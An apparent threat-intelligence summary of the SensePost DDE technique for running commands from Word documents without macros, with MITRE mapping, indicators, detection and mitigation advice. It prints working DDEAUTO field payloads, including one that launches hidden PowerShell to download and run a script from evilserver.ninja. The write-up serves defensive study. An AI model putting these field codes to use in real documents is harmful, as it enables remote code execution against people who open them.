Full Report
Authors: Etienne Stalmans, Saif El-Sherei What if we told you that there is a way to get command execution on MSWord without any Macros, or memory corruption?! Windows provides several methods for transferring data between applications. One method is to use the Dynamic Data Exchange (DDE) protocol. The DDE protocol is a set of messages and guidelines. It sends messages between applications that share data and uses shared memory to exchange data between applications. Applications can use the DDE protocol for one-time data transfers and for continuous exchanges in which applications send updates to one another as new data becomes available.
Analysis Summary
# Tool/Technique: Dynamic Data Exchange (DDE) Protocol Exploitation in MS Word
## Overview
This technique exploits the Dynamic Data Exchange (DDE) protocol implementation within Microsoft Word documents (.docx) to achieve arbitrary command execution without relying on traditional VBA macros or memory corruption vulnerabilities. DDE allows inter-application communication, and by leveraging DDE fields (`DDEAUTO` or `DDE`), an attacker can instruct the application to execute an external executable with specified arguments upon document opening, provided the user consents to updating the document links.
## Technical Details
- Type: Technique
- Platform: Microsoft Windows (MS Word)
- Capabilities: Enables execution of arbitrary operating system commands via document interaction prompts. Bypasses macro security measures.
- First Seen: The concept leveraging DDE was discussed previously in 2016 (Excel), but this specific exploitation path demonstrated in MS Word was publicly detailed on October 9, 2017.
## MITRE ATT&CK Mapping
- T1204 - User Execution
- T1204.002 - Malicious File
- T1574 - Hijack Execution Flow
- T1574.001 - DLL Search Order Hijacking (Implied if system binaries are substituted, though direct command execution is the primary vector)
- T1189 - Drive-by Compromise (If the file is downloaded and opened immediately)
## Functionality
### Core Capabilities
- **Command Launch via Fields:** Utilizes specific field codes within a Word document (e.g., `{DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe"}`) to initiate external processes.
- **Execution Trigger:** The command executes when the victim opens the document and accepts the prompt to "update the document links."
- **Initial Payload:** Demonstrated execution of `calc.exe` as proof of concept (PoC).
### Advanced Features
- **Macro Bypass:** Successfully circumvents restrictions placed on VBA macros, making it effective against security controls that only scrutinize macros.
- **Remote Code Execution (RCE) Vector:** The PoC demonstrated downloading and executing a PowerShell payload from a remote server: `{ DDEAUTO c:\Windows\System32\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://evilserver.ninja/pp.ps1');powershell -e $e "}`.
- **Alternative Field Usage:** Can use the `{DDE "Executable" "Arguments"}` syntax, which requires slightly modifying the `word/settings.xml` within the `.docx` archive structure to enforce automatic link updating prompts.
## Indicators of Compromise
- File Hashes: Not provided in the context.
- File Names: Malicious `.docx` files designed to trigger the DDE execution.
- Registry Keys: Not specified as a primary component of the exploit delivery, though executed binaries (like PowerShell) will leave standard artifacts.
- Network Indicators: Example payload uses `http://evilserver.ninja/pp.ps1` (Defanged: `http://evilserver[.]ninja/pp.ps1`).
- Behavioral Indicators: Processes spawning `cmd.exe` or `powershell.exe` directly following the opening of a non-macro-enabled Word document, usually preceded by a user clicking "Enable Content" or "Update Links."
## Associated Threat Actors
- The technique was publicly demonstrated by SensePost researchers (Etienne Stalmans, Saif El-Sherei) in October 2017. Specific threat actor attribution is not provided, but this technique has since been adopted by various threat groups.
## Detection Methods
- **Signature-based detection:** Look for the presence of specific DDE field syntax (`DDEAUTO` or `DDE`) within the OLE/XML structure of `.docx` files (specifically in document payload areas or field codes).
- **Behavioral detection:** Monitor for MS Word processes spawning subordinate command interpreters (`cmd.exe`, `powershell.exe`) upon document load, particularly when the user accepts link/object updates.
- **YARA rules if available:** YARA rules targeting key strings within the extracted XML structure of `.docx` files that spell out the DDE execution command.
## Mitigation Strategies
- **User Training:** Educate users about the dangers of automatically updating external links or content in documents from untrusted sources, even when macros appear disabled.
- **Hardening Recommendations:** Disable automatic update of external links or embedded objects in Office applications via Group Policy or local settings if possible.
- **Application Control/Whitelisting:** Restrict the execution of `cmd.exe` or `powershell.exe` from atypical parent processes, such as Microsoft Word.
## Related Tools/Techniques
- DDE Exploitation in MS Excel (mentioned by the authors as a prior success).
- OLE Actions exploitation in Office documents.
- Other macro-less execution vectors targeting Office applications (e.g., Follina vulnerability exploiting MSDT via HTML files or document links).